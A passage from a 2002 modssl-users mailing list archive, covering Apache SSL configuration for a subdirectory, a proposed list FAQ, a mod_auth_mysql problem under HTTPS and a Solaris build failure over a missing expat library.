  ...etc.


# Define the SSL service on port 443


  DocumentRoot /home/www/html/dir1
  SSLEngine on
  ...rest of SSL directives
  ...etc.


Now, a request to https://my.host.com/ will go straight to /home/www/html/dir1 under SSL, while http://my.host.com/ will continue to serve /home/www/html on plain HTTP.

There are a couple of snags with this configuration which you'd need to tidy up:

- In the scheme above, /home/www/html/dir1 is still accessible from plain HTTP. A rough-n-ready redirect will help matters (put inside the HTTP-VH):

  Redirect /dir1 https://my.host.com/

- for belt-and-braces, force SSL-only in this directory (put inside the HTTP-VH):
  
    SSLRequireSSL
  

- Be careful also with including things like images in SSL pages if the images are in a non-ssl directory. The browser will usually complain that some of the context is insecure and the user will get a lot of annoying pop-ups. To guard against this, symbolically link the images directory into the SSL directory and then reference it there. E.g. If you have /home/www/html/images, then in /home/www/html/dir1 do:

	$ ln -s ../images images

and then in your dir1 pages do:  so that the images look like they are under the SSL document root.

This recipe will get you started with SSL. Once you have it running, you can start to play around with other configurations. What you originally requested is possibel, but requires imaginative use of mod_rewrite which is not something you'd want to do on your first apache config :-)

Rgds,

Owen Boyle.








______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 13 17:04:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA26413; Tue, 13 Aug 2002 17:03:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA26409; Tue, 13 Aug 2002 17:03:03 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A31024CE61C; Tue, 13 Aug 2002 17:03:02 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 7E4182874E; Tue, 13 Aug 2002 17:02:31 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pluto.cbbanorte.com.mx id QAA26030; Tue, 13 Aug 2002 16:51:11 +0200 (MET DST)
Received: from pernt02.cbbanorte.com.mx (pernt02.cbbanorte.com.mx [200.10.246.202])
	by pluto.cbbanorte.com.mx (8.11.3/8.11.3) with ESMTP id g7DEox812200
	for ; Tue, 13 Aug 2002 09:50:59 -0500
Received: by PERNT02 with Internet Mail Service (5.5.2653.19)
	id ; Tue, 13 Aug 2002 09:44:55 -0500
Message-ID: 
From: "Marco A. Zamora Cunningham" 
To: "'modssl-users@modssl.org'" 
Subject: How about making a list FAQ? (was RE: enabling ssl for a subdirec
	tory of a vhost)
Date: Tue, 13 Aug 2002 09:44:54 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA26036
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Marco A. Zamora Cunningham" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Great explanation, Owen. I'm keeping it for whenever somebody asks me --for
the upteenth time-- how to do it.

Which set me thinking: The top 20 questions, which take up a lot of traffic
on this list, are really about configuration tips & tricks, and are not
really covered in the www.modssl.org FAQ. Why don't we help Ralph by adding
them to the FAQ? It would help a lot if we do that, and include a link to it
on the subscription confirmation and the list sig.

Ralph, would that be OK with you? 

Off the top of my head, I can think of a few Q's that crop up on an 
almost daily basis:
	- How do I set a a pure-virtual SSL host? (You don't.)
	- Well, then how do I set up an SSL host? (A basic 20-line
	  config, specifying _default_:443 and specificserver:443 
	  VH's)
	- How do I force all or a part of my site to be served 
	  exclusively by SSL? (Redirects by core, mod_rewrite and/or
	  mod_proxy)
	- Compiling on different platforms. (This might be the most 
	  difficult part to keep up to date, but some quick ten-or-
	  twenty liners, culled from correct answers on the list might 
	  be enough.)
	- MSIE keepalive strangeness and bug workarounds (global and 
	  agent-specific cipher stuff)
	- How do I sign/self-sign my certificate? (That one's already
	  in the docs; maybe five-line quick answer?)
	- How do I set up an SSL->plain HTTP gateway, or vice versa?
	  (mod_proxy, maybe with help by mod_rewrite, other solutions 
	  such as stunnel)

¿Can anybody think of other high-traffic topics not on the existing FAQ? 

I would be able to help on this FAQ by the start of next month. Anybody else
want to chip in?

Cheers...			Marco Zamora

> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> [...]
> >From: Justin Georgeson [mailto:jgeorgeson@unboundtech.com]
> >
> >I have Apache 1.3.17 with mod_ssl. I'm not a real proficient apache 
>
> Congratulations, you've already done the hard part of 
> installing mod_ssl and getting it running with certs and so 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 13 17:22:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA27103; Tue, 13 Aug 2002 17:21:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.pcs.loc id RAA27096; Tue, 13 Aug 2002 17:20:45 +0200 (MET DST)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: How about making a list FAQ? (was RE: enabling ssl for a subdirectory of a vhost)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Date: Tue, 13 Aug 2002 10:20:37 -0500
Message-ID: 
Thread-Topic: How about making a list FAQ? (was RE: enabling ssl for a subdirectory of a vhost)
Thread-Index: AcJC2tnBM0PjQwYnSzSPCeJg/wdQPgAAXhYw
From: "Woodraska, Robert J." 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA27098
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Woodraska, Robert J." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This sounds like a good idea to me.  It sounds like creating a config "cookbook", and a cookbook supplement has proven valuable to other porjects.  I got more information from Owen's explanation than reams of tutorials and documents, both online and deadtree format.  Of course it takes a special editor to make the information concise, informative, and somewhat self-explanatory, but there is already one guy who's shown that he can do it.  Other topics that seem to generate a lot of traffic are hardware engines, and mod_proxy/reverse proxies/load balancers.  I don't even know the best questions to ask on these, but they are recurring.

-----Original Message-----
From: Marco A. Zamora Cunningham [mailto:marco.zamora@cbbanorte.com.mx]
Sent: Tuesday, August 13, 2002 9:45 AM
To: 'modssl-users@modssl.org'
Subject: How about making a list FAQ? (was RE: enabling ssl for a
subdirectory of a vhost)


Great explanation, Owen. I'm keeping it for whenever somebody asks me --for
the upteenth time-- how to do it.

Which set me thinking: The top 20 questions, which take up a lot of traffic
on this list, are really about configuration tips & tricks, and are not
really covered in the www.modssl.org FAQ. Why don't we help Ralph by adding
them to the FAQ? It would help a lot if we do that, and include a link to it
on the subscription confirmation and the list sig.

Ralph, would that be OK with you? 

Off the top of my head, I can think of a few Q's that crop up on an 
almost daily basis:
	- How do I set a a pure-virtual SSL host? (You don't.)
	- Well, then how do I set up an SSL host? (A basic 20-line
	  config, specifying _default_:443 and specificserver:443 
	  VH's)
	- How do I force all or a part of my site to be served 
	  exclusively by SSL? (Redirects by core, mod_rewrite and/or
	  mod_proxy)
	- Compiling on different platforms. (This might be the most 
	  difficult part to keep up to date, but some quick ten-or-
	  twenty liners, culled from correct answers on the list might 
	  be enough.)
	- MSIE keepalive strangeness and bug workarounds (global and 
	  agent-specific cipher stuff)
	- How do I sign/self-sign my certificate? (That one's already
	  in the docs; maybe five-line quick answer?)
	- How do I set up an SSL->plain HTTP gateway, or vice versa?
	  (mod_proxy, maybe with help by mod_rewrite, other solutions 
	  such as stunnel)

¿Can anybody think of other high-traffic topics not on the existing FAQ? 

I would be able to help on this FAQ by the start of next month. Anybody else
want to chip in?

Cheers...			Marco Zamora

> -----Original Message-----
> From: Boyle Owen [mailto:Owen.Boyle@swx.com]
> [...]
> >From: Justin Georgeson [mailto:jgeorgeson@unboundtech.com]
> >
> >I have Apache 1.3.17 with mod_ssl. I'm not a real proficient apache 
>
> Congratulations, you've already done the hard part of 
> installing mod_ssl and getting it running with certs and so 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 14 07:04:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id HAA15132; Wed, 14 Aug 2002 07:03:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id HAA15122; Wed, 14 Aug 2002 07:02:52 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 06C354CE683; Wed, 14 Aug 2002 07:02:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CCCD0286B6; Wed, 14 Aug 2002 06:58:34 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from unity.apfa.org id WAA05467; Tue, 13 Aug 2002 22:58:34 +0200 (MET DST)
Received: (qmail 27658 invoked by uid 7794); 13 Aug 2002 15:58:27 -0500
Received: from tcropper@mail.tcrop.net by unity by uid 7791 with qmail-scanner-1.12 (sweep: 2.10/3.58. . Clear:. Processed in 1.019474 secs); 13 Aug 2002 20:58:27 -0000
Received: from unknown (HELO mail.tcrop.net) (10.128.0.200)
  by 0 with SMTP; 13 Aug 2002 15:58:25 -0500
Message-ID: <3D5972F2.A18F5AA3@mail.tcrop.net>
Date: Tue, 13 Aug 2002 15:58:26 -0500
From: TCrop 
X-Mailer: Mozilla 4.79 [en] (Win98; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Help with mod_ssl & mod_auth_mysql
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: TCrop 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I want to secure a directory running under https section of my website
by forcing a user/passwd challenge.

Is it possible to use .htaccess and mod_auth_mysql with mod_ssl so that
the login is secure?


I can get  a .htaccess to work with a .htpasswd but have NOT been able
to get .htaccess to work with mod_auth_mysql in the HTTPS area.

The following .htaccess WORKS under HTTP:

AuthName "Protected Area"
AuthType Basic
AuthUserFile /dev/null
AuthGroupFile /dev/null


        Auth_MySQL On
        Auth_MySQL_Authoritative On
        Auth_MySQL_DB auth
        Auth_MySQL_Password_Table usr
        Auth_MySQL_Encrypted_Passwords off
        Auth_MySQL_Encryption_Types Plaintext
        Auth_MySQL_Username_Field user
        Auth_MySQL_Password_Field pass
        Auth_MySQL_Empty_Passwords On
        require valid-user


The following is from the error log when I move the above working
.htaccess file to the HTTPS area of the website.

.htaccess: Invalid command 'Auth_MySQL', perhaps mis-spelled or defined
by a module not included in the server configuration


Thanks

-Tim
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 14 17:57:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07642; Wed, 14 Aug 2002 17:56:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from io.uwinnipeg.ca id RAA07618; Wed, 14 Aug 2002 17:56:01 +0200 (MET DST)
Received: from 040 (ceb056.uwinnipeg.ca [142.132.30.56])
	by io.uwinnipeg.ca (8.10.2/8.10.2) with SMTP id g7EFttc08818
	for ; Wed, 14 Aug 2002 10:55:55 -0500 (CDT)
Message-ID: <002701c243ab$12aecf30$381e848e@uwinnipeg.ca>
From: "Paul F" 
To: 
Subject: http or https but not both?
Date: Wed, 14 Aug 2002 10:55:55 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul F" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have a fresh linux installation with apache + mod_ssl.

With the mod_ssl module and AddModule uncommented, I can access
https://mysite..... BUT NOT
http://mysite.....

Any help appreciated!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 14 23:04:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA15228; Wed, 14 Aug 2002 23:03:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA15201; Wed, 14 Aug 2002 23:02:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EECE44CE620; Wed, 14 Aug 2002 23:02:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 9EB3D2882E; Wed, 14 Aug 2002 22:58:34 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from server1.oti-hsv.local id SAA08816; Wed, 14 Aug 2002 18:23:10 +0200 (MET DST)
Received: by SERVER1 with Internet Mail Service (5.5.2656.59)
	id ; Wed, 14 Aug 2002 11:20:05 -0500
Message-ID: <42509AA414E9D4118D2F00A0CC7C3CE26F83@SERVER1>
From: "Torstenson, Eric" 
To: "'modssl-users@modssl.org'" 
Subject: Contribution Segment of the ModSSL web site problems
Date: Wed, 14 Aug 2002 11:20:04 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Torstenson, Eric" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Not sure who is responsible for the web site itself, but there does seem to
be a problem.

Has anyone else noticed that the contribution portion of the site is
malfunctioning? I have tried it with a couple different browsers, and get
the same response (it's displaying code for some of the pages) Everything
but the contribution portion seems to be working fine.

Eric
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 14 23:04:24 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA15247; Wed, 14 Aug 2002 23:03:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id XAA15206; Wed, 14 Aug 2002 23:02:09 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4C97F4CE74D; Wed, 14 Aug 2002 23:02:08 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D7C6628860; Wed, 14 Aug 2002 22:58:59 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from isomailgw.iso.com id WAA14922; Wed, 14 Aug 2002 22:44:31 +0200 (MET DST)
Received: by isomailgw.iso.com with Internet Mail Service (5.5.2653.19)
	id ; Wed, 14 Aug 2002 16:41:00 -0400
Message-ID: <18BB6B64BCFB3043A2C3FC9925611DD60E95A2@email.iso.com>
From: "Boualem, Moncef" 
To: "'modssl-users@modssl.org'" 
Subject: fatal: libexpat.so.0: open failed: No such file or directory
Date: Wed, 14 Aug 2002 16:41:05 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C243D2.E9279BDA"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boualem, Moncef" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C243D2.E9279BDA
Content-Type: text/plain

Hi,
when I try to compile apache using modssl, I go through step 1, 2, 3, 4 with no problem.
then at step 5 everything goes fine until "make" is run, then it fails with the below message.
does anyone have an idea why it's looking for a file that doesn't exists in the openSSL library,
and what's the fix?



# cd apache_1.3.26
# make
===> src
make[1]: Entering directory `/home/i70815/apache_1.3.26'
make[2]: Entering directory `/home/i70815/apache_1.3.26/src'
===> src/os/unix
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../../apaci` os.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../../apaci` os-inline.c
rm -f libos.a
ar cr libos.a os.o os-inline.o
ranlib libos.a
<=== src/os/unix
===> src/ap
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_cpystrn.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_execve.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_fnmatch.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_getpass.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_md5c.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_signal.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_slack.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_snprintf.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_sha1.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_checkpass.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_base64.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_ebcdic.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_strtol.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_hook.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_ctx.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` ap_mm.c
rm -f libap.a
ar cr libap.a ap_cpystrn.o ap_execve.o ap_fnmatch.o ap_getpass.o ap_md5c.o ap_signal.o ap_slack.o ap_snprintf.o ap_sha1.o 
ap_checkpass.o ap_base64.o ap_ebcdic.o ap_strtol.o ap_hook.o ap_ctx.o ap_mm.o
ranlib libap.a
<=== src/ap
===> src/main
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` gen_test_char.c
gcc  -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -DNO_DL_NEEDED `../apaci` -L/home/i70815/openssl-0.9.6g  -o gen_test_char 
gen_test_char.o  -lsocket -lnsl -lpthread  -lssl -lcrypto -lexpat
./gen_test_char >test_char.h
ld.so.1: ./gen_test_char: fatal: libexpat.so.0: open failed: No such file or directory
Killed
make[3]: *** [test_char.h] Error 137
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/home/i70815/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/home/i70815/apache_1.3.26'
make: *** [build] Error 2




------_=_NextPart_001_01C243D2.E9279BDA
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






fatal: libexpat.so.0: open failed: No such file or =
directory




Hi,

when I try to compile apache using =
modssl, I go through step 1, 2, 3, 4 with no problem.

then at step 5 everything goes fine =
until "make" is run, then it fails with the below =
message.

does anyone have an idea why it's =
looking for a file that doesn't exists in the openSSL library,

and what's the fix?








# cd apache_1.3.26

# make

=3D=3D=3D> src

make[1]: Entering directory =
`/home/i70815/apache_1.3.26'

make[2]: Entering directory =
`/home/i70815/apache_1.3.26/src'

=3D=3D=3D> src/os/unix

gcc -c  -I../../os/unix =
-I../../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../../apaci` os.c

gcc -c  -I../../os/unix =
-I../../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../../apaci` os-inline.c



rm -f libos.a

ar cr libos.a os.o =
os-inline.o

ranlib libos.a

<=3D=3D=3D src/os/unix

=3D=3D=3D> src/ap

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_cpystrn.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_execve.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_fnmatch.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_getpass.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_md5c.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_signal.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_slack.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_snprintf.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_sha1.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_checkpass.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_base64.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_ebcdic.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_strtol.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_hook.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_ctx.c

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` ap_mm.c

rm -f libap.a

ar cr libap.a ap_cpystrn.o =
ap_execve.o ap_fnmatch.o ap_getpass.o ap_md5c.o ap_signal.o ap_slack.o =
ap_snprintf.o ap_sha1.o 



ap_checkpass.o ap_base64.o =
ap_ebcdic.o ap_strtol.o ap_hook.o ap_ctx.o ap_mm.o

ranlib libap.a

<=3D=3D=3D src/ap

=3D=3D=3D> src/main

gcc -c  -I../os/unix =
-I../include   -DSOLARIS2=3D270 -DMOD_SSL=3D208110 -DEAPI =
-DNO_DL_NEEDED `../apaci` gen_test_char.c

gcc  -DSOLARIS2=3D270 =
-DMOD_SSL=3D208110 -DEAPI -DNO_DL_NEEDED `../apaci` =
-L/home/i70815/openssl-0.9.6g  -o gen_test_char 

gen_test_char.o  -lsocket =
-lnsl -lpthread  -lssl -lcrypto -lexpat

./gen_test_char =
>test_char.h

ld.so.1: ./gen_test_char: fatal: =
libexpat.so.0: open failed: No such file or directory

Killed

make[3]: *** [test_char.h] Error =
137

make[2]: *** [subdirs] Error =
1

make[2]: Leaving directory =
`/home/i70815/apache_1.3.26/src'

make[1]: *** [build-std] Error =
2

make[1]: Leaving directory =
`/home/i70815/apache_1.3.26'

make: *** [build] Error 2









------_=_NextPart_001_01C243D2.E9279BDA--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 14 23:32:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA16635; Wed, 14 Aug 2002 23:31:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from scrabble.freeuk.net id XAA16625; Wed, 14 Aug 2002 23:30:21 +0200 (MET DST)
Received: from du-069-0549.access.clara.net ([217.158.156.40] helo=charon)
	by scrabble.freeuk.net with smtp (Exim 3.36 #2)
	id 17f5ic-00021a-00
	for modssl-users@modssl.org; Wed, 14 Aug 2002 22:30:19 +0100
Message-ID: <001001c243d9$f7bd0780$289c9ed9@charon>
From: "Madhon" 
To: 
References: <18BB6B64BCFB3043A2C3FC9925611DD60E95A2@email.iso.com>
Subject: Re: fatal: libexpat.so.0: open failed: No such file or directory
Date: Wed, 14 Aug 2002 22:31:35 +0100
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Madhon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

fatal: libexpat.so.0: open failed: No such file or directoryyou might be
missing the expat library
the source is available http://sourceforge.net/projects/expat/

----- Original Message -----
From: Boualem, Moncef
To: 'modssl-users@modssl.org'
Sent: Wednesday, August 14, 2002 9:41 PM
Subject: fatal: libexpat.so.0: open failed: No such file or directory


Hi,
when I try to compile apache using modssl, I go through step 1, 2, 3, 4 with
no problem.
then at step 5 everything goes fine until "make" is run, then it fails with
the below message.
does anyone have an idea why it's looking for a file that doesn't exists in
the openSSL library,
and what's the fix?



# cd apache_1.3.26
# make
===> src
make[1]: Entering directory `/home/i70815/apache_1.3.26'
make[2]: Entering directory `/home/i70815/apache_1.3.26/src'
===> src/os/unix
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=270 -DMOD_SSL=208110 -D
EAPI -DNO_DL_NEEDED `../../apaci` os.c
gcc -c  -I../../os/unix -I../../include   -DSOLARIS2=270 -DMOD_SSL=208110 -D
EAPI -DNO_DL_NEEDED `../../apaci` os-inline.c
rm -f libos.a
ar cr libos.a os.o os-inline.o
ranlib libos.a
<=== src/os/unix
===> src/ap
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_cpystrn.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_execve.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_fnmatch.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_getpass.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_md5c.c
gcc -c  -I../os/unix -I../include   -DSOLARIS2=270 -DMOD_SSL=208110 -DEAPI -
DNO_DL_NEEDED `../apaci` ap_signal.c
